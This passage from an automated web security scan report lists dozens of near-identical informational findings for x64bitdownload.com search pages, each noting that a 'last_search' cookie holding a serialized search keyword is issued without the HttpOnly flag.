Path:	/64-bit-board-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.826. http://www.x64bitdownload.com/64-bit-boards-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-boards-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.827. http://www.x64bitdownload.com/64-bit-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-client-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.828. http://www.x64bitdownload.com/64-bit-commander-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-commander-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.829. http://www.x64bitdownload.com/64-bit-community-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-community-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.830. http://www.x64bitdownload.com/64-bit-complex-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-complex-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.831. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.832. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.833. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.834. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.835. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22explorer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.836. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.837. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.838. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.839. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.840. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.841. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.842. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.843. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.844. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.845. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.846. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.847. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.848. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.849. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.850. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.851. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.852. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.853. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.854. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.855. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.856. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.857. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.858. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.859. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.860. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.861. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.862. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.863. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.864. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

